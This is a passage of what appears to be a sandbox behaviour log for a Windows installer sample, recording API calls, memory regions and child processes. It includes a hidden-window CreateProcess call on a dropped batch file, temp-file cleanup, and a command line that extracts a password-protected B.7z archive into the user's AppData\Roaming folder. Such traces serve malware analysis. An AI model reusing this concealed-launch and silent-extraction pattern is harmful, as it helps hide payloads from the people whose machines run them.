lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.543] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.543] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.543] lstrcpynA (in: lpString1=0x33723c, lpString2="kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4", iMaxLength=1024 | out: lpString1="kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4") returned="kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4" [0160.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.543] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.543] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.544] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.544] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.544] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.544] lstrcpyA (in: lpString1=0x33e508, lpString2="CreateProcess" | out: lpString1="CreateProcess") returned="CreateProcess" [0160.544] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.544] lstrcpynA (in: lpString1=0x341608, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.544] lstrcpynA (in: lpString1=0x341608, lpString2="3281864", iMaxLength=1024 | out: lpString1="3281864") returned="3281864" [0160.544] lstrcpynA (in: lpString1=0x341608, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="3281864") returned 7 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="3098296") returned 7 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="134217728") returned 9 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] lstrcpynA (in: lpString1=0x341608, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="1") returned 1 [0160.556] lstrcpyA (in: lpString1=0x431000, lpString2="1" | out: lpString1="1") returned="1" [0160.557] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.557] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.557] lstrcpyA (in: lpString1=0x33e508, lpString2="GetExitCodeProcess" | out: lpString1="GetExitCodeProcess") returned="GetExitCodeProcess" [0160.558] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0160.558] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1") returned 1 [0160.558] lstrcpyA (in: lpString1=0x341608, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.559] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.559] lstrcpyA (in: lpString1=0x33e508, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0160.559] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="1") returned 1 [0160.560] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.560] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.560] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0160.560] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.560] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.561] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local") returned 31 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2f0ea8 [0160.561] FindClose (in: hFindFile=0x2f0ea8 | out: hFindFile=0x2f0ea8) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData") returned 25 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.561] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1") returned 17 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.562] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.562] lstrlenA (lpString="C:\\Users") returned 8 [0160.562] lstrcatA (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.562] GetFileAttributesA (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0160.562] lstrcpynA (in: lpString1=0x42b878, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.562] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\*.*") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\*.*" [0160.562] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" [0160.562] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\") returned 49 [0160.562] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\*.*", lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 0x2e7a78 [0160.562] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", dwFileAttributes=0x2020) returned 1 [0160.562] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\nsexec.dll")) returned 1 [0160.563] FindNextFileA (in: hFindFile=0x2e7a78, lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 1 [0160.563] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", dwFileAttributes=0x2020) returned 1 [0160.563] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 1 [0160.563] FindNextFileA (in: hFindFile=0x2e7a78, lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 1 [0160.563] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll", dwFileAttributes=0x2020) returned 1 [0160.564] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\userinfo.dll")) returned 1 [0160.564] FindNextFileA (in: hFindFile=0x2e7a78, lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 0 [0160.564] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.564] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.564] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.564] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0160.564] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" [0160.564] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 0x2010 [0160.564] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\", dwFileAttributes=0x2010) returned 1 [0160.565] RemoveDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 1 [0160.565] OleUninitialize () [0160.566] ExitProcess (uExitCode=0x0) Thread: id = 55 os_tid = 0x818 Thread: id = 56 os_tid = 0x94 Process: id = "5" image_name = "a.exe" filename = "c:\\users\\adu0vk~1\\appdata\\local\\temp\\a.exe" page_root = "0x77a26000" os_pid = "0x454" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x4c8" cmd_line = "A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa" cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 999 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1001 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1002 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1003 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1004 start_va = 0x400000 end_va = 0x499fff entry_point = 0x400000 region_type = mapped_file name = "a.exe" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\A.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\a.exe") Region: id = 1005 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1006 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1007 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1008 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1009 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1010 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1011 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1012 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1013 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1014 start_va = 0x690000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1015 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1016 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1017 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1018 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1019 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1020 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1021 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1022 start_va = 0x900000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1023 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1024 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1025 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1026 start_va = 0x75a60000 end_va = 0x75bbbfff entry_point = 0x75a60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1027 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1028 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1029 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1030 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1031 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1032 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1033 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1034 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1035 start_va = 0x77810000 end_va = 0x7789efff entry_point = 0x77810000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1036 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1037 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1038 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1039 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1040 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1041 start_va = 0x230000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1042 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1043 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1044 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1045 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1046 start_va = 0x4a0000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1047 start_va = 0x710000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1048 start_va = 0xa00000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Thread: id = 57 os_tid = 0x764 [0159.161] GetVersion () returned 0x1db10106 [0159.162] GetVersionExA (in: lpVersionInformation=0x18feb4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x100000, dwPlatformId=0x2000, szCSDVersion="") | out: lpVersionInformation=0x18feb4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.163] GetCurrentThreadId () returned 0x764 [0159.163] GetStartupInfoA (in: lpStartupInfo=0x18ff0c | out: lpStartupInfo=0x18ff0c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1a0, hStdOutput=0x198, hStdError=0x198)) [0159.163] GetStdHandle (nStdHandle=0xfffffff6) returned 0x1a0 [0159.163] GetFileType (hFile=0x1a0) returned 0x3 [0159.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x198 [0159.163] GetFileType (hFile=0x198) returned 0x3 [0159.163] GetStdHandle (nStdHandle=0xfffffff4) returned 0x198 [0159.163] GetFileType (hFile=0x198) returned 0x3 [0159.163] SetHandleCount (uNumber=0x20) returned 0x20 [0159.163] GetCommandLineA () returned="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa" [0159.163] GetEnvironmentStringsW () returned 0x914a00* [0159.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1493, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1493 [0159.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1493, lpMultiByteStr=0x790ce0, cbMultiByte=1493, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1493 [0159.164] FreeEnvironmentStringsW (penv=0x914a00) returned 1 [0159.164] GetACP () returned 0x4e4 [0159.164] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ff18 | out: lpCPInfo=0x18ff18) returned 1 [0159.164] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fef0 | out: lpCPInfo=0x18fef0) returned 1 [0159.164] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f9ac | out: lpCharType=0x18f9ac) returned 1 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x18f794, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ") returned 256 [0159.165] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpCharType=0x18f9f0 | out: lpCharType=0x18f9f0) returned 1 [0159.165] LCMapStringW (in: Locale=0x0, 